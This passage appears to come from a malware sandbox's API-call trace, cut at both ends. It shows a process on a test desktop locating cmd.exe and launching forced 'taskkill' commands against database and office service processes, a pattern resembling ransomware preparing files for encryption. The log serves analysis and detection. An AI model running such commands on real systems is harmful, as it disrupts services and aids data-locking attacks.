ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0165.914] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0165.914] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123e8f70, nSize=0x64 | out: lpBuffer="") returned 0x63 [0165.914] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1e08 | out: lpFileInformation=0x123f1e08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0165.915] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9040, nSize=0x64 | out: lpBuffer="") returned 0x35 [0165.915] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1e58 | out: lpFileInformation=0x123f1e58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0165.915] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0165.915] GetConsoleMode (in: hConsoleHandle=0x158, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0165.915] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0165.915] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0165.915] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0165.915] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0165.915] GetEnvironmentStringsW () returned 0x8ea900* [0165.916] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0165.916] GetCurrentProcess () returned 0xffffffff [0165.916] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x158, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234fd30, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234fd30*=0x130) returned 1 [0165.916] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234fd34, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234fd34*=0x13c) returned 1 [0165.916] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x1234fd38, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x1234fd38*=0x140) returned 1 [0165.916] VirtualAlloc (lpAddress=0x12440000, dwSize=0x100000, flAllocationType=0x1000, flProtect=0x4) returned 0x12440000 [0165.927] VirtualAlloc (lpAddress=0x110ec000, dwSize=0x10000, flAllocationType=0x1000, flProtect=0x4) returned 0x110ec000 [0165.928] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im agntsvc.exeisqlplussvc.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x12444000, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im agntsvc.exeisqlplussvc.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x154, hThread=0x144, dwProcessId=0x1128, dwThreadId=0x1154)) returned 1 [0166.004] CloseHandle (hObject=0x144) returned 1 [0166.004] CloseHandle (hObject=0x140) returned 1 [0166.004] CloseHandle (hObject=0x13c) returned 1 [0166.004] CloseHandle (hObject=0x130) returned 1 [0166.004] CloseHandle (hObject=0x158) returned 1 [0166.004] CloseHandle (hObject=0x138) returned 1 [0166.004] CloseHandle (hObject=0x134) returned 1 [0166.004] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0167.779] SetEvent (hEvent=0x150) returned 1 [0167.779] GetExitCodeProcess (in: hProcess=0x154, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0167.779] GetProcessTimes (in: hProcess=0x154, lpCreationTime=0x1242ae60, lpExitTime=0x1242ae68, lpKernelTime=0x1242ae70, lpUserTime=0x1242ae78 | out: lpCreationTime=0x1242ae60, lpExitTime=0x1242ae68, lpKernelTime=0x1242ae70, lpUserTime=0x1242ae78) returned 1 [0167.780] CloseHandle (hObject=0x154) returned 1 [0167.780] SetEvent (hEvent=0x128) returned 1 [0167.781] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0167.824] SetEvent (hEvent=0x128) returned 1 [0167.825] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bb110, nSize=0x64 | out: lpBuffer="") returned 0x35 [0167.825] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1ef8 | out: lpFileInformation=0x123b1ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.826] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.826] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123b1f48 | out: lpFileInformation=0x123b1f48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.826] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.826] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123b1f98 | out: lpFileInformation=0x123b1f98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.826] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.826] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x12446008 | out: lpFileInformation=0x12446008*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.826] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.827] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12446058 | out: lpFileInformation=0x12446058*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.827] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.827] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x124460a8 | out: lpFileInformation=0x124460a8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.827] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.827] GetFileAttributesExW (in: lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), fInfoLevelId=0x0, lpFileInformation=0x124460f8 | out: lpFileInformation=0x124460f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.827] CreateFileW (lpFileName="cmd.exe.vbe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.827] GetFileAttributesExW (in: lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), fInfoLevelId=0x0, lpFileInformation=0x12446148 | out: lpFileInformation=0x12446148*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.828] CreateFileW (lpFileName="cmd.exe.js" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.js"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.828] GetFileAttributesExW (in: lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), fInfoLevelId=0x0, lpFileInformation=0x12446198 | out: lpFileInformation=0x12446198*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.831] CreateFileW (lpFileName="cmd.exe.jse" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.jse"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.831] GetFileAttributesExW (in: lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), fInfoLevelId=0x0, lpFileInformation=0x124461e8 | out: lpFileInformation=0x124461e8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.831] CreateFileW (lpFileName="cmd.exe.wsf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsf"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.832] GetFileAttributesExW (in: lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), fInfoLevelId=0x0, lpFileInformation=0x12446238 | out: lpFileInformation=0x12446238*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.832] CreateFileW (lpFileName="cmd.exe.wsh" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.wsh"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.832] GetFileAttributesExW (in: lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), fInfoLevelId=0x0, lpFileInformation=0x12446288 | out: lpFileInformation=0x12446288*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0167.832] CreateFileW (lpFileName="cmd.exe.msc" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.msc"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0167.832] GetEnvironmentVariableW (in: lpName="path", lpBuffer=0x123bb1e0, nSize=0x64 | out: lpBuffer="") returned 0x63 [0167.832] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x124462d8 | out: lpFileInformation=0x124462d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0167.833] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123bb2b0, nSize=0x64 | out: lpBuffer="") returned 0x35 [0167.833] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x12446328 | out: lpFileInformation=0x12446328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aa5d0fd, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x2aa5d0fd, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x2aa5d0fd, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x31600)) returned 1 [0167.833] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0167.918] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0x123a3a7c | out: lpMode=0x123a3a7c) returned 0 [0167.918] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0167.918] GetConsoleMode (in: hConsoleHandle=0x134, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0167.918] CreateFileW (lpFileName="NUL" (normalized: "\\device\\null"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0167.918] GetConsoleMode (in: hConsoleHandle=0x138, lpMode=0x123a3a80 | out: lpMode=0x123a3a80) returned 0 [0167.918] GetEnvironmentStringsW () returned 0x8ea900* [0167.919] FreeEnvironmentStringsW (penv=0x8ea900) returned 1 [0167.919] GetCurrentProcess () returned 0xffffffff [0167.919] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448240, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448240*=0x158) returned 1 [0167.919] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448244, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448244*=0x130) returned 1 [0167.919] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x138, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x12448248, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0x12448248*=0x13c) returned 1 [0167.920] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cmd.exe", lpCommandLine="cmd.exe /c \"taskkill /f /im xfssvccon.exe \"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x400, lpEnvironment=0x1243ca80, lpCurrentDirectory=0x0, lpStartupInfo=0x123a3aa4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x158, hStdOutput=0x130, hStdError=0x13c), lpProcessInformation=0x123a3a80 | out: lpCommandLine="cmd.exe /c \"taskkill /f /im xfssvccon.exe \"", lpProcessInformation=0x123a3a80*(hProcess=0x144, hThread=0x140, dwProcessId=0x510, dwThreadId=0xfc8)) returned 1 [0168.087] SetEvent (hEvent=0x150) returned 1 [0168.087] CloseHandle (hObject=0x140) returned 1 [0168.087] CloseHandle (hObject=0x13c) returned 1 [0168.087] CloseHandle (hObject=0x130) returned 1 [0168.087] CloseHandle (hObject=0x158) returned 1 [0168.087] CloseHandle (hObject=0x154) returned 1 [0168.087] CloseHandle (hObject=0x134) returned 1 [0168.087] CloseHandle (hObject=0x138) returned 1 [0168.088] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0169.962] SetEvent (hEvent=0x150) returned 1 [0169.962] GetExitCodeProcess (in: hProcess=0x144, lpExitCode=0x123a3bb4 | out: lpExitCode=0x123a3bb4*=0x80) returned 1 [0169.963] GetProcessTimes (in: hProcess=0x144, lpCreationTime=0x12423520, lpExitTime=0x12423528, lpKernelTime=0x12423530, lpUserTime=0x12423538 | out: lpCreationTime=0x12423520, lpExitTime=0x12423528, lpKernelTime=0x12423530, lpUserTime=0x12423538) returned 1 [0169.963] CloseHandle (hObject=0x144) returned 1 [0169.963] SetEvent (hEvent=0x128) returned 1 [0169.963] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x5) returned 0x102 [0169.973] SetEvent (hEvent=0x128) returned 1 [0169.974] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x123e9110, nSize=0x64 | out: lpBuffer="") returned 0x35 [0169.974] GetFileAttributesExW (in: lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1ea8 | out: lpFileInformation=0x123f1ea8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.976] CreateFileW (lpFileName="cmd.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.977] GetFileAttributesExW (in: lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), fInfoLevelId=0x0, lpFileInformation=0x123f1ef8 | out: lpFileInformation=0x123f1ef8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.977] CreateFileW (lpFileName="cmd.exe.com" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.com"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.977] GetFileAttributesExW (in: lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), fInfoLevelId=0x0, lpFileInformation=0x123f1f48 | out: lpFileInformation=0x123f1f48*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.977] CreateFileW (lpFileName="cmd.exe.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.exe"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.977] GetFileAttributesExW (in: lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), fInfoLevelId=0x0, lpFileInformation=0x123f1f98 | out: lpFileInformation=0x123f1f98*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.977] CreateFileW (lpFileName="cmd.exe.bat" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.bat"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.977] GetFileAttributesExW (in: lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), fInfoLevelId=0x0, lpFileInformation=0x12450008 | out: lpFileInformation=0x12450008*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.977] CreateFileW (lpFileName="cmd.exe.cmd" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.cmd"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, hTemplateFile=0x0) returned 0xffffffff [0169.977] GetFileAttributesExW (in: lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), fInfoLevelId=0x0, lpFileInformation=0x12450058 | out: lpFileInformation=0x12450058*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0169.978] CreateFileW (lpFileName="cmd.exe.vbs" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\cmd.exe.vbs"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x2000000, 